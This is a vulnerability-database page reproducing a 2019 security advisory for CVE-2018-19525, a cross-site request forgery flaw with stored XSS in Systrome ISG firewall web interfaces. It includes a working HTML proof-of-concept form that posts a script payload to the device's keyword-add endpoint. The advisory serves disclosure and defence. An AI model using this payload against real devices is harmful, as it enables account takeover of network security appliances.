Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SYSTORME ISG Cross Site Request Forgery

🗓️ 13 Feb 2019 00:00:00Reported by Kaustubh G. PadwadType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 74 Views

Authenticated XSRF leads to complete Account Takeover in SYSTORME ISG Product

Related
Code
ReporterTitlePublishedViews
Family
0day.today		SYSTORME ISG Cross Site Request Forgery Vulnerability
13 Feb 201900:00
zdt
ATTACKERKB		CVE-2018-19525
21 Mar 201916:00
attackerkb
Circl		CVE-2018-19525
13 Feb 201914:39
circl
CVE		CVE-2018-19525
17 Mar 201918:43
cve
Cvelist		CVE-2018-19525
17 Mar 201918:43
cvelist
EUVD		EUVD-2018-11214
7 Oct 202500:30
euvd
NVD		CVE-2018-19525
21 Mar 201916:00
nvd
OSV		CVE-2018-19525
21 Mar 201916:00
osv
Prion		Cross site request forgery (csrf)
21 Mar 201916:00
prion
RedhatCVE		CVE-2018-19525
9 Jan 202612:00
redhatcve
Rows per page
`=====================================================  
Authenticated XSRF leads to complete Account Takeover  
=====================================================  
  
. contents:: Table Of Content  
  
Overview  
========  
  
Title:- Authenticated XSRF leads to complete account takeover in all SYSTORME ISG Products.  
CVE ID:- CVE-2018-19525  
Author: Kaustubh G. Padwad  
Vendor: Systrome Networks (http://systrome.com/about/)  
Products:  
1.ISG-600C  
2.ISG-600H  
3.ISG-800W  
  
  
Tested Version: : ISG-V1.1-R2.1_TRUNK-20180914.bin(Respetive for others)  
Severity: High--Critical  
  
Advisory ID  
============  
KSA-Dev-002  
  
  
About the Product:  
==================  
  
Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the cloud-computing era. It integrates the L2-L7security features of the next-generation firewall, is based on the user identification and application identification and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL filtering, and other security functions. It provides the cloud interface. The security cloud management platform based on the big data platform architecture can monitor the network topology and device status in real time, simplifying the online deployment of the professional device via the auto configuration delivery. The real-time monitoring of the mobile terminal reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome cloud gateway is the best access security choice of the middle and smal  
l enterprises, branch interconnection, and chain enterprises.  
  
Description:   
============  
An issue was discovered on Systrome ISG-600C,ISG-600H, and ISG-800W 1.1-R2.1_TRUNK-20180914.bin devices. There is CSRF via /ui/?g=obj_keywords_add and/ui/?g=obj_keywords_addsave  
with resultant XSS because of a lack of csrf token validation.  
  
Additional Information  
======================  
The web interface of the ISG-Firewalls does not validate the csrftoken,and the ?g=obj_keywords_add page does not properly sanitize the  
user input which leads to xss, By combining this two attack we can form the XSRF request which leads to complete account takeover using XSRF.  
  
[Vulnerability Type]  
====================  
Cross Site Request Forgery (CSRF)  
  
How to Reproduce: (POC):  
========================  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://192.168.1.200/ui/?g=obj_keywords_add" method="POST">  
<input type="hidden" name="name" value="xsrf" />  
<input type="hidden" name="description" value="<svg><script>//" />  
<input type="hidden" name="NewLine;confirm(1338);</script </svg>" value="" />  
<input type="hidden" name="keyword" value="xsrf" />  
<input type="hidden" name="submit_post" value="obj_keywords_addsave" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
  
[Affected Component]  
obj_keywords_add ,obj_keywords_addsave, CSRF Vulnerabilities,  
  
------------------------------------------  
  
[Attack Type]  
Remote  
  
------------------------------------------  
  
[Impact Code execution]  
true  
  
------------------------------------------  
  
[Attack Vectors]  
once victim open the crafted url the device will get compromise  
  
Mitigation  
==========  
  
vendr is working on the same he will submit the solution maybe by december 1st weak.  
  
Disclosure:   
===========  
02-Nov-2018 Discoverd the Vulnerability  
15-Nov-2018 Reported to vendor   
25-Nov-2018 Requested for CVE/Cve's.  
26-Nov-2018 CVE-Assign   
  
  
[Vendor of Product]  
Systrome Networks (http://systrome.com/about/)  
  
credits:  
========  
* Kaustubh Padwad  
* Information Security Researcher  
* [email protected]  
* https://s3curityb3ast.github.io/  
* https://twitter.com/s3curityb3ast  
* http://breakthesec.com  
* https://www.linkedin.com/in/kaustubhpadwad  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Feb 2019 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.0042
systorme isgcross site request forgeryaccount takeovercsrf vulnerabilitiesremotecode execution
74